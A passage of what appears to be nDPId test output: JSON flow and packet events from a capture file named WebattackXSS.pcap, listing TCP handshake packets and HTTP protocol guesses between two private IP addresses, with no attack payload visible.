{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347665473,"flow_last_seen":1499347670803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59624,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347665473,"flow_last_seen":1499347670803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347668069,"flow_last_seen":1499347673803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59650,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347668069,"flow_last_seen":1499347673803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59650,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347669336,"flow_last_seen":1499347674804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59664,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347669336,"flow_last_seen":1499347674804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347670582,"flow_last_seen":1499347675804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59678,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347670582,"flow_last_seen":1499347675804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59678,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347673136,"flow_last_seen":1499347678804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59704,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347673136,"flow_last_seen":1499347678804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59704,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347674433,"flow_last_seen":1499347679471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59718,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347674433,"flow_last_seen":1499347679471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6882,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347793575,"flow_last_seen":1499347793575,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347793575,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6882,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":1,"flow_last_seen":1499347793575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347793575,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86x9AAD4G2rCsEAABwKgKMu4+AFCp1uVpAAAAAKACchDRggAAAgQFtAQCCAoBPA52AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":2,"flow_last_seen":1499347793575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347793575,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7j6t+bU4qdblaqAScSCLXgAAAgQFtAQCCAoD5d\/rATwOdgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6884,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":3,"flow_last_seen":1499347793576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347793576,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06yBAAD4G2resEAABwKgKMu4+AFCp1uVqrfm1OYAQAOUqZgAAAQEICgE8DnYD5d\/r"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6903,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347796130,"flow_last_seen":1499347796130,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347796130,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32784,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6903,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":1,"flow_last_seen":1499347796130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347796130,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dkVAAD4GT4usEAABwKgKMoAQAFA7jGawAAAAAKACchAqNgAAAgQFtAQCCAoBPBD1AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":2,"flow_last_seen":1499347796130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347796130,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgBCKrPedO4xmsaAScSDCewAAAgQFtAQCCAoD5eJpATwQ9QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6905,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":3,"flow_last_seen":1499347796130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347796130,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dkZAAD4GT5KsEAABwKgKMoAQAFA7jGaxiqz3noAQAOVhgwAAAQEICgE8EPUD5eJp"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6912,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347797419,"flow_last_seen":1499347797419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347797419,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32798,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6912,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":1,"flow_last_seen":1499347797419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347797419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tZJAAD4GED6sEAABwKgKMoAeAFBmW6elAAAAAKACchC9IQAAAgQFtAQCCAoBPBI3AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6913,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":2,"flow_last_seen":1499347797419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347797419,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgB7MdTcTZlunpqAScSDS5QAAAgQFtAQCCAoD5eOsATwSNwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6915,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":3,"flow_last_seen":1499347797420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347797420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tZNAAD4GEEWsEAABwKgKMoAeAFBmW6emzHU3FIAQAOVx7QAAAQEICgE8EjcD5eOs"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6924,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347798713,"flow_last_seen":1499347798713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347798713,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6924,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":1,"flow_last_seen":1499347798713,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347798713,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LWRAAD4GmGysEAABwKgKMoAsAFA\/CD4fAAAAAKACchBMqQAAAgQFtAQCCAoBPBN7AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6925,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":2,"flow_last_seen":1499347798713,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347798713,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgCwp5bxCPwg+IKAScSB+iwAAAgQFtAQCCAoD5eTvATwTewEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6926,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":3,"flow_last_seen":1499347798714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347798714,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LWVAAD4GmHOsEAABwKgKMoAsAFA\/CD4gKeW8Q4AQAOUdkwAAAQEICgE8E3sD5eTv"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6943,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347801271,"flow_last_seen":1499347801271,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347801271,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32838,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6943,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":1,"flow_last_seen":1499347801271,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347801271,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZRhAAD4GYLisEAABwKgKMoBGAFBeRnDiAAAAAKACchD4DgAAAgQFtAQCCAoBPBX6AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6944,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":2,"flow_last_seen":1499347801271,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347801271,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgEYSjN1bXkZw46AScSAdsQAAAgQFtAQCCAoD5edvATwV+gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6945,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":3,"flow_last_seen":1499347801271,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347801271,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZRlAAD4GYL+sEAABwKgKMoBGAFBeRnDjEozdXIAQAOW8uAAAAQEICgE8FfoD5edv"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347802549,"flow_last_seen":1499347802549,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802549,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":1,"flow_last_seen":1499347802549,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347802549,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jF5AAD4GOXKsEAABwKgKMoBUAFDx5ZtkAAAAAKACchA4nwAAAgQFtAQCCAoBPBc6AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":2,"flow_last_seen":1499347802549,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347802549,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgFQ6vzwG8eWbZaAScSDWJAAAAgQFtAQCCAoD5eiuATwXOgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":3,"flow_last_seen":1499347802550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347802550,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jF9AAD4GOXmsEAABwKgKMoBUAFDx5ZtlOr88B4AQAOV1LAAAAQEICgE8FzoD5eiu"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347678198,"flow_last_seen":1499347683805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59758,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347678198,"flow_last_seen":1499347683805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347679469,"flow_last_seen":1499347684805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347679469,"flow_last_seen":1499347684805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347680746,"flow_last_seen":1499347685805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59786,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347680746,"flow_last_seen":1499347685805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59786,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347683313,"flow_last_seen":1499347688806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59812,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347683313,"flow_last_seen":1499347688806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347684563,"flow_last_seen":1499347689806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59826,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347684563,"flow_last_seen":1499347689806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 